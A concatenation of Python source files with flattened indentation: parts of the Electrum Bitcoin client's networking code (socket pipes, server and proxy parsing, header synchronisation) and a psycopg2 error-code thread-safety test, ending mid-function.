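# Illustrative sketch, not part of the original module: parse_json implements
# the newline-delimited JSON framing used by SocketPipe below; it returns the
# first complete message plus the unconsumed remainder of the buffer.
def _demo_parse_json():
    buf = b'{"id": 1, "result": "pong"}\n{"id": 2'
    msg, rest = parse_json(buf)
    assert msg == {'id': 1, 'result': 'pong'}
    assert rest == b'{"id": 2'                 # kept until the newline arrives
    assert parse_json(rest) == (None, rest)    # no complete frame yet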
class timeout(Exception):
pass
import socket
import errno
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
except socket.error as e:
                if e.errno in (errno.EWOULDBLOCK, errno.EAGAIN):  # py3 OSError: use .errno, not e[0]
print_error("EAGAIN: retrying")
time.sleep(0.1)
continue
                elif 'timed out' in str(e):  # py3 OSError is not indexable; match the message instead
print_error("socket timeout, retry")
time.sleep(0.1)
continue
else:
traceback.print_exc(file=sys.stdout)
raise e
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
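# Illustrative sketch, not part of the original module: QueuePipe mirrors the
# get()/send()/send_all() interface of SocketPipe but over in-process queues,
# so the same request/response code can run without a real socket.
def _demo_queue_pipe():
    pipe = QueuePipe()
    pipe.get_queue.put({'id': 1, 'result': 'pong'})
    assert pipe.get() == {'id': 1, 'result': 'pong'}
    pipe.send_all([{'id': 2}, {'id': 3}])
    assert pipe.send_queue.qsize() == 2
    try:
        pipe.get()        # nothing queued: raises the timeout exception above
    except timeout:
        pass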
def check_www_dir(rdir):
import urllib, shutil, os
if not os.path.exists(rdir):
os.mkdir(rdir)
index = os.path.join(rdir, 'index.html')
if not os.path.exists(index):
print_error("copying index.html")
src = os.path.join(os.path.dirname(__file__), 'www', 'index.html')
shutil.copy(src, index)
files = [
"https://code.jquery.com/jquery-1.9.1.min.js",
"https://raw.githubusercontent.com/davidshimjs/qrcodejs/master/qrcode.js",
"https://code.jquery.com/ui/1.10.3/jquery-ui.js",
"https://code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css"
]
for URL in files:
path = urllib.parse.urlsplit(URL).path
filename = os.path.basename(path)
path = os.path.join(rdir, filename)
if not os.path.exists(path):
print_error("downloading ", URL)
urllib.request.urlretrieve(URL, path)
|
test_errcodes.py
|
#!/usr/bin/env python
# test_errcodes.py - unit test for psycopg2.errcodes module
#
# Copyright (C) 2015 Daniele Varrazzo <daniele.varrazzo@gmail.com>
#
# psycopg2 is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# In addition, as a special exception, the copyright holders give
# permission to link this program with the OpenSSL library (or with
# modified versions of OpenSSL that use the same license as OpenSSL),
# and distribute linked combinations including the two.
#
# You must obey the GNU Lesser General Public License in all respects for
# all of the code used other than OpenSSL.
#
# psycopg2 is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
# License for more details.
from .testutils import unittest, ConnectingTestCase, slow
try:
reload
except NameError:
try:
from importlib import reload
except ImportError:
from imp import reload
from threading import Thread
from psycopg2 import errorcodes
class ErrocodeTests(ConnectingTestCase):
@slow
def test_lookup_threadsafe(self):
# Increase if it does not fail with KeyError
MAX_CYCLES = 2000
errs = []
def f(pg_code="40001"):
try:
errorcodes.lookup(pg_code)
except Exception as e:
errs.append(e)
for __ in range(MAX_CYCLES):
reload(errorcodes)
(t1, t2) = (Thread(target=f), Thread(target=f))
(t1.start(), t2.start())
(t1.join(), t2.join())
if errs:
self.fail(
"raised %s errors in %s cycles (first is %s %s)"
% (len(errs), MAX_CYCLES, errs[0].__class__.__name__, errs[0])
)
def test_suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == "__main__":
unittest.main()
|
network.py
|
# Electrum - Lightweight Bitcoin Client
# Copyright (c) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import time
import queue
import os
import stat
import errno
import random
import re
import select
from collections import defaultdict
import threading
import socket
import json
import socks
from . import util
from . import bitcoin
from .bitcoin import *
from .networks import NetworkConstants
from .interface import Connection, Interface
from . import blockchain
from .version import PACKAGE_VERSION, PROTOCOL_VERSION
NODES_RETRY_INTERVAL = 60
SERVER_RETRY_INTERVAL = 10
def parse_servers(result):
""" parse servers list into dict format"""
from .version import PROTOCOL_VERSION
servers = {}
for item in result:
host = item[1]
out = {}
version = None
pruning_level = '-'
if len(item) > 2:
for v in item[2]:
                if re.match(r"[st]\d*", v):
protocol, port = v[0], v[1:]
if port == '': port = bitcoin.NetworkConstants.DEFAULT_PORTS[protocol]
out[protocol] = port
elif re.match("v(.?)+", v):
version = v[1:]
                elif re.match(r"p\d*", v):
pruning_level = v[1:]
if pruning_level == '': pruning_level = '0'
if out:
out['pruning'] = pruning_level
out['version'] = version
servers[host] = out
return servers
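# Illustrative sketch, not part of the original module: one entry of a
# 'server.peers.subscribe' result (host and feature list are placeholders)
# and the dict parse_servers() builds from it.
def _demo_parse_servers():
    result = [['127.0.0.1', 'electrum.example.org',
               ['v1.0', 's50002', 't50001', 'p100']]]
    assert parse_servers(result) == {
        'electrum.example.org': {'s': '50002', 't': '50001',
                                 'pruning': '100', 'version': '1.0'}}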
def filter_version(servers):
def is_recent(version):
try:
return util.normalize_version(version) >= util.normalize_version(PROTOCOL_VERSION)
except Exception as e:
return False
return {k: v for k, v in servers.items() if is_recent(v.get('version'))}
def filter_protocol(hostmap, protocol = 's'):
'''Filters the hostmap for those implementing protocol.
The result is a list in serialized form.'''
eligible = []
for host, portmap in hostmap.items():
port = portmap.get(protocol)
if port:
eligible.append(serialize_server(host, port, protocol))
return eligible
def pick_random_server(hostmap = None, protocol = 's', exclude_set = set()):
if hostmap is None:
hostmap = bitcoin.NetworkConstants.DEFAULT_SERVERS
eligible = list(set(filter_protocol(hostmap, protocol)) - exclude_set)
return random.choice(eligible) if eligible else None
from .simple_config import SimpleConfig
proxy_modes = ['socks4', 'socks5', 'http']
def serialize_proxy(p):
if not isinstance(p, dict):
return None
return ':'.join([p.get('mode'), p.get('host'), p.get('port'),
p.get('user', ''), p.get('password', '')])
def deserialize_proxy(s):
if not isinstance(s, str):
return None
if s.lower() == 'none':
return None
proxy = { "mode":"socks5", "host":"localhost" }
args = s.split(':')
n = 0
if proxy_modes.count(args[n]) == 1:
proxy["mode"] = args[n]
n += 1
if len(args) > n:
proxy["host"] = args[n]
n += 1
if len(args) > n:
proxy["port"] = args[n]
n += 1
else:
proxy["port"] = "8080" if proxy["mode"] == "http" else "1080"
if len(args) > n:
proxy["user"] = args[n]
n += 1
if len(args) > n:
proxy["password"] = args[n]
return proxy
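# Illustrative sketch, not part of the original module: the
# 'mode:host:port[:user[:password]]' string format accepted above.
def _demo_deserialize_proxy():
    assert deserialize_proxy('socks5:localhost:9050') == \
        {'mode': 'socks5', 'host': 'localhost', 'port': '9050'}
    # a bare host keeps the socks5 default and falls back to port 1080
    assert deserialize_proxy('localhost') == \
        {'mode': 'socks5', 'host': 'localhost', 'port': '1080'}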
def deserialize_server(server_str):
host, port, protocol = str(server_str).rsplit(':', 2)
assert protocol in 'st'
int(port) # Throw if cannot be converted to int
return host, port, protocol
def serialize_server(host, port, protocol):
return str(':'.join([host, port, protocol]))
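# Illustrative sketch, not part of the original module: servers are stored as
# 'host:port:protocol' strings; rsplit(':', 2) in deserialize_server keeps a
# host that itself contains ':' intact.  The hostname below is a placeholder.
def _demo_server_string():
    s = serialize_server('electrum.example.org', '50002', 's')
    assert s == 'electrum.example.org:50002:s'
    assert deserialize_server(s) == ('electrum.example.org', '50002', 's')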
class Network(util.DaemonThread):
"""The Network class manages a set of connections to remote electrum
servers, each connected socket is handled by an Interface() object.
Connections are initiated by a Connection() thread which stops once
the connection succeeds or fails.
Our external API:
- Member functions get_header(), get_interfaces(), get_local_height(),
get_parameters(), get_server_height(), get_status_value(),
is_connected(), set_parameters(), stop()
"""
def __init__(self, config=None):
if config is None:
config = {} # Do not use mutables as default values!
util.DaemonThread.__init__(self)
self.config = SimpleConfig(config) if isinstance(config, dict) else config
self.num_server = 10 if not self.config.get('oneserver') else 0
self.blockchains = blockchain.read_blockchains(self.config)
self.print_error("blockchains", self.blockchains.keys())
self.blockchain_index = config.get('blockchain_index', 0)
if self.blockchain_index not in self.blockchains.keys():
self.blockchain_index = 0
# Server for addresses and transactions
self.default_server = self.config.get('server', None)
# Sanitize default server
if self.default_server:
try:
deserialize_server(self.default_server)
except:
self.print_error('Warning: failed to parse server-string; falling back to random.')
self.default_server = None
if not self.default_server:
self.default_server = pick_random_server()
self.lock = threading.Lock()
self.pending_sends = []
self.message_id = 0
self.debug = False
self.irc_servers = {} # returned by interface (list from irc)
self.recent_servers = self.read_recent_servers()
self.banner = ''
self.donation_address = ''
self.relay_fee = None
# callbacks passed with subscriptions
self.subscriptions = defaultdict(list)
self.sub_cache = {}
# callbacks set by the GUI
self.callbacks = defaultdict(list)
dir_path = os.path.join( self.config.path, 'certs')
if not os.path.exists(dir_path):
os.mkdir(dir_path)
os.chmod(dir_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
# subscriptions and requests
self.subscribed_addresses = set()
# Requests from client we've not seen a response to
self.unanswered_requests = {}
# retry times
self.server_retry_time = time.time()
self.nodes_retry_time = time.time()
# kick off the network. interface is the main server we are currently
# communicating with. interfaces is the set of servers we are connecting
# to or have an ongoing connection with
self.interface = None
self.interfaces = {}
self.auto_connect = self.config.get('auto_connect', True)
self.connecting = set()
self.socket_queue = queue.Queue()
self.start_network(deserialize_server(self.default_server)[2],
deserialize_proxy(self.config.get('proxy')))
def register_callback(self, callback, events):
with self.lock:
for event in events:
self.callbacks[event].append(callback)
def unregister_callback(self, callback):
with self.lock:
for callbacks in self.callbacks.values():
if callback in callbacks:
callbacks.remove(callback)
def trigger_callback(self, event, *args):
with self.lock:
callbacks = self.callbacks[event][:]
[callback(event, *args) for callback in callbacks]
def recent_servers_file(self):
return os.path.join(self.config.path, "recent-servers")
def read_recent_servers(self):
if not self.config.path:
return []
try:
with open(self.recent_servers_file(), "r", encoding='utf-8') as f:
data = f.read()
return json.loads(data)
except:
return []
def save_recent_servers(self):
if not self.config.path:
return
s = json.dumps(self.recent_servers, indent=4, sort_keys=True)
try:
with open(self.recent_servers_file(), "w", encoding='utf-8') as f:
f.write(s)
except:
pass
def get_server_height(self):
return self.interface.tip if self.interface else 0
def server_is_lagging(self):
sh = self.get_server_height()
if not sh:
self.print_error('no height for main interface')
return True
lh = self.get_local_height()
result = (lh - sh) > 1
if result:
self.print_error('%s is lagging (%d vs %d)' % (self.default_server, sh, lh))
return result
def set_status(self, status):
self.connection_status = status
self.notify('status')
def is_connected(self):
return self.interface is not None
def is_connecting(self):
return self.connection_status == 'connecting'
def is_up_to_date(self):
return self.unanswered_requests == {}
def queue_request(self, method, params, interface=None):
# If you want to queue a request on any interface it must go
# through this function so message ids are properly tracked
if interface is None:
interface = self.interface
message_id = self.message_id
self.message_id += 1
if self.debug:
self.print_error(interface.host, "-->", method, params, message_id)
interface.queue_request(method, params, message_id)
return message_id
def send_subscriptions(self):
self.print_error('sending subscriptions to', self.interface.server, len(self.unanswered_requests), len(self.subscribed_addresses))
self.sub_cache.clear()
# Resend unanswered requests
requests = self.unanswered_requests.values()
self.unanswered_requests = {}
for request in requests:
message_id = self.queue_request(request[0], request[1])
self.unanswered_requests[message_id] = request
self.queue_request('server.banner', [])
self.queue_request('server.donation_address', [])
self.queue_request('server.peers.subscribe', [])
self.request_fee_estimates()
self.queue_request('blockchain.relayfee', [])
for h in self.subscribed_addresses:
self.queue_request('blockchain.scripthash.subscribe', [h])
def request_fee_estimates(self):
self.config.requested_fee_estimates()
for i in bitcoin.FEE_TARGETS:
self.queue_request('blockchain.estimatefee', [i])
def get_status_value(self, key):
if key == 'status':
value = self.connection_status
elif key == 'banner':
value = self.banner
elif key == 'fee':
value = self.config.fee_estimates
elif key == 'updated':
value = (self.get_local_height(), self.get_server_height())
elif key == 'servers':
value = self.get_servers()
elif key == 'interfaces':
value = self.get_interfaces()
return value
def notify(self, key):
if key in ['status', 'updated']:
self.trigger_callback(key)
else:
self.trigger_callback(key, self.get_status_value(key))
def get_parameters(self):
host, port, protocol = deserialize_server(self.default_server)
return host, port, protocol, self.proxy, self.auto_connect
def get_donation_address(self):
if self.is_connected():
return self.donation_address
def get_interfaces(self):
'''The interfaces that are in connected state'''
return list(self.interfaces.keys())
def get_servers(self):
out = bitcoin.NetworkConstants.DEFAULT_SERVERS
if self.irc_servers:
out.update(filter_version(self.irc_servers.copy()))
else:
for s in self.recent_servers:
try:
host, port, protocol = deserialize_server(s)
except:
continue
if host not in out:
out[host] = { protocol:port }
return out
def start_interface(self, server):
        if server not in self.interfaces and server not in self.connecting:
if server == self.default_server:
self.print_error("connecting to %s as new interface" % server)
self.set_status('connecting')
self.connecting.add(server)
c = Connection(server, self.socket_queue, self.config.path)
def start_random_interface(self):
exclude_set = self.disconnected_servers.union(set(self.interfaces))
server = pick_random_server(self.get_servers(), self.protocol, exclude_set)
if server:
self.start_interface(server)
def start_interfaces(self):
self.start_interface(self.default_server)
for i in range(self.num_server - 1):
self.start_random_interface()
def set_proxy(self, proxy):
self.proxy = proxy
# Store these somewhere so we can un-monkey-patch
if not hasattr(socket, "_socketobject"):
socket._socketobject = socket.socket
socket._getaddrinfo = socket.getaddrinfo
if proxy:
self.print_error('setting proxy', proxy)
proxy_mode = proxy_modes.index(proxy["mode"]) + 1
socks.setdefaultproxy(proxy_mode,
proxy["host"],
int(proxy["port"]),
# socks.py seems to want either None or a non-empty string
username=(proxy.get("user", "") or None),
password=(proxy.get("password", "") or None))
socket.socket = socks.socksocket
# prevent dns leaks, see http://stackoverflow.com/questions/13184205/dns-over-proxy
socket.getaddrinfo = lambda *args: [(socket.AF_INET, socket.SOCK_STREAM, 6, '', (args[0], args[1]))]
else:
socket.socket = socket._socketobject
socket.getaddrinfo = socket._getaddrinfo
def start_network(self, protocol, proxy):
assert not self.interface and not self.interfaces
assert not self.connecting and self.socket_queue.empty()
self.print_error('starting network')
self.disconnected_servers = set([])
self.protocol = protocol
self.set_proxy(proxy)
self.start_interfaces()
def stop_network(self):
self.print_error("stopping network")
for interface in list(self.interfaces.values()):
self.close_interface(interface)
if self.interface:
self.close_interface(self.interface)
assert self.interface is None
assert not self.interfaces
self.connecting = set()
# Get a new queue - no old pending connections thanks!
self.socket_queue = queue.Queue()
def set_parameters(self, host, port, protocol, proxy, auto_connect):
proxy_str = serialize_proxy(proxy)
server = serialize_server(host, port, protocol)
# sanitize parameters
try:
deserialize_server(serialize_server(host, port, protocol))
if proxy:
proxy_modes.index(proxy["mode"]) + 1
int(proxy['port'])
except:
return
self.config.set_key('auto_connect', auto_connect, False)
self.config.set_key("proxy", proxy_str, False)
self.config.set_key("server", server, True)
# abort if changes were not allowed by config
if self.config.get('server') != server or self.config.get('proxy') != proxy_str:
return
self.auto_connect = auto_connect
if self.proxy != proxy or self.protocol != protocol:
# Restart the network defaulting to the given server
self.stop_network()
self.default_server = server
self.start_network(protocol, proxy)
elif self.default_server != server:
self.switch_to_interface(server)
else:
self.switch_lagging_interface()
self.notify('updated')
def switch_to_random_interface(self):
'''Switch to a random connected server other than the current one'''
servers = self.get_interfaces() # Those in connected state
if self.default_server in servers:
servers.remove(self.default_server)
if servers:
self.switch_to_interface(random.choice(servers))
def switch_lagging_interface(self):
'''If auto_connect and lagging, switch interface'''
if self.server_is_lagging() and self.auto_connect:
# switch to one that has the correct header (not height)
header = self.blockchain().read_header(self.get_local_height())
filtered = list(map(lambda x:x[0], filter(lambda x: x[1].tip_header==header, self.interfaces.items())))
if filtered:
choice = random.choice(filtered)
self.switch_to_interface(choice)
def switch_to_interface(self, server):
'''Switch to server as our interface. If no connection exists nor
being opened, start a thread to connect. The actual switch will
happen on receipt of the connection notification. Do nothing
if server already is our interface.'''
self.default_server = server
if server not in self.interfaces:
self.interface = None
self.start_interface(server)
return
i = self.interfaces[server]
if self.interface != i:
self.print_error("switching to", server)
# stop any current interface in order to terminate subscriptions
# fixme: we don't want to close headers sub
#self.close_interface(self.interface)
self.interface = i
self.send_subscriptions()
self.set_status('connected')
self.notify('updated')
def close_interface(self, interface):
if interface:
if interface.server in self.interfaces:
self.interfaces.pop(interface.server)
if interface.server == self.default_server:
self.interface = None
interface.close()
def add_recent_server(self, server):
# list is ordered
if server in self.recent_servers:
self.recent_servers.remove(server)
self.recent_servers.insert(0, server)
self.recent_servers = self.recent_servers[0:20]
self.save_recent_servers()
def process_response(self, interface, response, callbacks):
if self.debug:
self.print_error("<--", response)
error = response.get('error')
result = response.get('result')
method = response.get('method')
params = response.get('params')
# We handle some responses; return the rest to the client.
if method == 'server.version':
interface.server_version = result
elif method == 'blockchain.headers.subscribe':
if error is None:
self.on_notify_header(interface, result)
elif method == 'server.peers.subscribe':
if error is None:
self.irc_servers = parse_servers(result)
self.notify('servers')
elif method == 'server.banner':
if error is None:
self.banner = result
self.notify('banner')
elif method == 'server.donation_address':
if error is None:
self.donation_address = result
elif method == 'blockchain.estimatefee':
if error is None and result > 0:
i = params[0]
fee = int(result*COIN)
self.config.update_fee_estimates(i, fee)
self.print_error("fee_estimates[%d]" % i, fee)
self.notify('fee')
elif method == 'blockchain.relayfee':
if error is None:
self.relay_fee = int(result * COIN)
self.print_error("relayfee", self.relay_fee)
elif method == 'blockchain.block.headers':
self.on_block_headers(interface, response)
elif method == 'blockchain.block.get_header':
self.on_get_header(interface, response)
for callback in callbacks:
callback(response)
def get_index(self, method, params):
""" hashable index for subscriptions and cache"""
return str(method) + (':' + str(params[0]) if params else '')
def process_responses(self, interface):
responses = interface.get_responses()
for request, response in responses:
if request:
method, params, message_id = request
k = self.get_index(method, params)
# client requests go through self.send() with a
# callback, are only sent to the current interface,
# and are placed in the unanswered_requests dictionary
client_req = self.unanswered_requests.pop(message_id, None)
if client_req:
assert interface == self.interface
callbacks = [client_req[2]]
else:
# fixme: will only work for subscriptions
k = self.get_index(method, params)
callbacks = self.subscriptions.get(k, [])
# Copy the request method and params to the response
response['method'] = method
response['params'] = params
# Only once we've received a response to an addr subscription
# add it to the list; avoids double-sends on reconnection
if method == 'blockchain.scripthash.subscribe':
self.subscribed_addresses.add(params[0])
else:
if not response: # Closed remotely / misbehaving
self.connection_down(interface.server)
break
# Rewrite response shape to match subscription request response
method = response.get('method')
params = response.get('params')
k = self.get_index(method, params)
if method == 'blockchain.headers.subscribe':
response['result'] = params[0]
response['params'] = []
elif method == 'blockchain.scripthash.subscribe':
response['params'] = [params[0]] # addr
response['result'] = params[1]
callbacks = self.subscriptions.get(k, [])
# update cache if it's a subscription
if method.endswith('.subscribe'):
self.sub_cache[k] = response
# Response is now in canonical form
self.process_response(interface, response, callbacks)
def subscribe_to_scripthashes(self, scripthashes, callback):
msgs = [('blockchain.scripthash.subscribe', [sh])
for sh in scripthashes]
self.send(msgs, callback)
def request_scripthash_history(self, sh, callback):
self.send([('blockchain.scripthash.get_history', [sh])], callback)
def send(self, messages, callback):
'''Messages is a list of (method, params) tuples'''
messages = list(messages)
with self.lock:
self.pending_sends.append((messages, callback))
def process_pending_sends(self):
# Requests needs connectivity. If we don't have an interface,
# we cannot process them.
if not self.interface:
return
with self.lock:
sends = self.pending_sends
self.pending_sends = []
for messages, callback in sends:
for method, params in messages:
r = None
if method.endswith('.subscribe'):
k = self.get_index(method, params)
# add callback to list
l = self.subscriptions.get(k, [])
if callback not in l:
l.append(callback)
self.subscriptions[k] = l
# check cached response for subscriptions
r = self.sub_cache.get(k)
if r is not None:
util.print_error("cache hit", k)
callback(r)
else:
message_id = self.queue_request(method, params)
self.unanswered_requests[message_id] = method, params, callback
def unsubscribe(self, callback):
'''Unsubscribe a callback to free object references to enable GC.'''
# Note: we can't unsubscribe from the server, so if we receive
# subsequent notifications process_response() will emit a harmless
# "received unexpected notification" warning
with self.lock:
for v in self.subscriptions.values():
if callback in v:
v.remove(callback)
def connection_down(self, server):
'''A connection to server either went down, or was never made.
We distinguish by whether it is in self.interfaces.'''
self.disconnected_servers.add(server)
if server == self.default_server:
self.set_status('disconnected')
if server in self.interfaces:
self.close_interface(self.interfaces[server])
self.notify('interfaces')
for b in self.blockchains.values():
if b.catch_up == server:
b.catch_up = None
def new_interface(self, server, socket):
# todo: get tip first, then decide which checkpoint to use.
self.add_recent_server(server)
interface = Interface(server, socket)
interface.blockchain = None
interface.tip_header = None
interface.tip = 0
interface.mode = 'default'
interface.request = None
self.interfaces[server] = interface
# server.version should be the first message
params = [PACKAGE_VERSION, PROTOCOL_VERSION]
self.queue_request('server.version', params, interface)
self.queue_request('blockchain.headers.subscribe', [True], interface)
if server == self.default_server:
self.switch_to_interface(server)
#self.notify('interfaces')
def maintain_sockets(self):
'''Socket maintenance.'''
# Responses to connection attempts?
while not self.socket_queue.empty():
server, socket = self.socket_queue.get()
if server in self.connecting:
self.connecting.remove(server)
if socket:
self.new_interface(server, socket)
else:
self.connection_down(server)
# Send pings and shut down stale interfaces
# must use copy of values
for interface in list(self.interfaces.values()):
if interface.has_timed_out():
self.connection_down(interface.server)
elif interface.ping_required():
self.queue_request('server.ping', [], interface)
now = time.time()
# nodes
if len(self.interfaces) + len(self.connecting) < self.num_server:
self.start_random_interface()
if now - self.nodes_retry_time > NODES_RETRY_INTERVAL:
self.print_error('network: retrying connections')
self.disconnected_servers = set([])
self.nodes_retry_time = now
# main interface
if not self.is_connected():
if self.auto_connect:
if not self.is_connecting():
self.switch_to_random_interface()
else:
if self.default_server in self.disconnected_servers:
if now - self.server_retry_time > SERVER_RETRY_INTERVAL:
self.disconnected_servers.remove(self.default_server)
self.server_retry_time = now
else:
self.switch_to_interface(self.default_server)
else:
if self.config.is_fee_estimates_update_required():
self.request_fee_estimates()
def request_chunk(self, interface, idx):
interface.print_error("requesting chunk %d" % idx)
height = idx * 2016
self.queue_request('blockchain.block.headers', [height, 2016],
interface)
interface.request = idx
interface.req_time = time.time()
def on_block_headers(self, interface, response):
'''Handle receiving a chunk of block headers'''
error = response.get('error')
result = response.get('result')
params = response.get('params')
if result is None or params is None or error is not None:
interface.print_error(error or 'bad response')
return
# Ignore unsolicited chunks
index = interface.request
if index * 2016 != params[0]:
return
hexdata = result['hex']
connect = interface.blockchain.connect_chunk(index, hexdata)
# If not finished, get the next chunk
if not connect:
self.connection_down(interface.server)
return
if interface.blockchain.height() < interface.tip:
self.request_chunk(interface, index+1)
else:
interface.request = None
interface.mode = 'default'
interface.print_error('catch up done', interface.blockchain.height())
interface.blockchain.catch_up = None
self.notify('updated')
def request_header(self, interface, height):
#interface.print_error("requesting header %d" % height)
self.queue_request('blockchain.block.get_header', [height], interface)
interface.request = height
interface.req_time = time.time()
def on_get_header(self, interface, response):
'''Handle receiving a single block header'''
header = response.get('result')
if not header:
interface.print_error(response)
self.connection_down(interface.server)
return
height = header.get('block_height')
if interface.request != height:
interface.print_error("unsolicited header",interface.request, height)
self.connection_down(interface.server)
return
chain = blockchain.check_header(header)
if interface.mode == 'backward':
if chain:
interface.print_error("binary search")
interface.mode = 'binary'
interface.blockchain = chain
interface.good = height
next_height = (interface.bad + interface.good) // 2
else:
if height == 0:
self.connection_down(interface.server)
next_height = None
else:
interface.bad = height
interface.bad_header = header
delta = interface.tip - height
next_height = max(0, interface.tip - 2 * delta)
elif interface.mode == 'binary':
if chain:
interface.good = height
interface.blockchain = chain
else:
interface.bad = height
interface.bad_header = header
if interface.bad != interface.good + 1:
next_height = (interface.bad + interface.good) // 2
elif not interface.blockchain.can_connect(interface.bad_header, check_height=False):
self.connection_down(interface.server)
next_height = None
else:
branch = self.blockchains.get(interface.bad)
if branch is not None:
if branch.check_header(interface.bad_header):
interface.print_error('joining chain', interface.bad)
next_height = None
elif branch.parent().check_header(header):
interface.print_error('reorg', interface.bad, interface.tip)
interface.blockchain = branch.parent()
next_height = None
else:
interface.print_error('checkpoint conflicts with existing fork', branch.path())
branch.write(b'', 0)
branch.save_header(interface.bad_header)
interface.mode = 'catch_up'
interface.blockchain = branch
next_height = interface.bad + 1
interface.blockchain.catch_up = interface.server
else:
bh = interface.blockchain.height()
next_height = None
if bh > interface.good:
if not interface.blockchain.check_header(interface.bad_header):
b = interface.blockchain.fork(interface.bad_header)
self.blockchains[interface.bad] = b
interface.blockchain = b
interface.print_error("new chain", b.checkpoint)
interface.mode = 'catch_up'
next_height = interface.bad + 1
interface.blockchain.catch_up = interface.server
else:
assert bh == interface.good
if interface.blockchain.catch_up is None and bh < interface.tip:
interface.print_error("catching up from %d"% (bh + 1))
interface.mode = 'catch_up'
next_height = bh + 1
interface.blockchain.catch_up = interface.server
self.notify('updated')
elif interface.mode == 'catch_up':
can_connect = interface.blockchain.can_connect(header)
if can_connect:
interface.blockchain.save_header(header)
next_height = height + 1 if height < interface.tip else None
else:
# go back
interface.print_error("cannot connect", height)
interface.mode = 'backward'
interface.bad = height
interface.bad_header = header
next_height = height - 1
if next_height is None:
# exit catch_up state
interface.print_error('catch up done', interface.blockchain.height())
interface.blockchain.catch_up = None
self.switch_lagging_interface()
self.notify('updated')
else:
raise BaseException(interface.mode)
# If not finished, get the next header
if next_height:
if interface.mode == 'catch_up' and interface.tip > next_height + 50:
self.request_chunk(interface, next_height // 2016)
else:
self.request_header(interface, next_height)
else:
interface.mode = 'default'
interface.request = None
self.notify('updated')
# refresh network dialog
self.notify('interfaces')
def maintain_requests(self):
for interface in list(self.interfaces.values()):
            if interface.request and time.time() - interface.req_time > 20:  # req_time is set by request_chunk/request_header
interface.print_error("blockchain request timed out")
self.connection_down(interface.server)
continue
def wait_on_sockets(self):
# Python docs say Windows doesn't like empty selects.
# Sleep to prevent busy looping
if not self.interfaces:
time.sleep(0.1)
return
rin = [i for i in self.interfaces.values()]
win = [i for i in self.interfaces.values() if i.num_requests()]
try:
rout, wout, xout = select.select(rin, win, [], 0.1)
except socket.error as e:
            code = e.errno  # select.error is an alias of OSError on py3
if code == errno.EINTR:
return
raise
assert not xout
for interface in wout:
interface.send_requests()
for interface in rout:
self.process_responses(interface)
def init_headers_file(self):
b = self.blockchains[0]
if b.get_hash(0) == bitcoin.NetworkConstants.GENESIS:
self.downloading_headers = False
return
filename = b.path()
def download_thread():
try:
import urllib.request, socket
socket.setdefaulttimeout(30)
self.print_error("downloading ", bitcoin.NetworkConstants.HEADERS_URL)
urllib.request.urlretrieve(bitcoin.NetworkConstants.HEADERS_URL, filename + '.tmp')
os.rename(filename + '.tmp', filename)
self.print_error("done.")
except Exception:
self.print_error("download failed. creating file", filename)
open(filename, 'wb+').close()
b = self.blockchains[0]
with b.lock: b.update_size()
self.downloading_headers = False
self.downloading_headers = True
t = threading.Thread(target = download_thread)
t.daemon = True
t.start()
def run(self):
self.init_headers_file()
while self.is_running() and self.downloading_headers:
time.sleep(1)
while self.is_running():
self.maintain_sockets()
self.wait_on_sockets()
self.maintain_requests()
self.run_jobs() # Synchronizer and Verifier
self.process_pending_sends()
self.stop_network()
self.on_stop()
def on_notify_header(self, interface, header_dict):
header_hex, height = header_dict['hex'], header_dict['height']
header = blockchain.deserialize_header(bfh(header_hex), height)
interface.tip_header = header
interface.tip = height
if interface.mode != 'default':
return
b = blockchain.check_header(header)
if b:
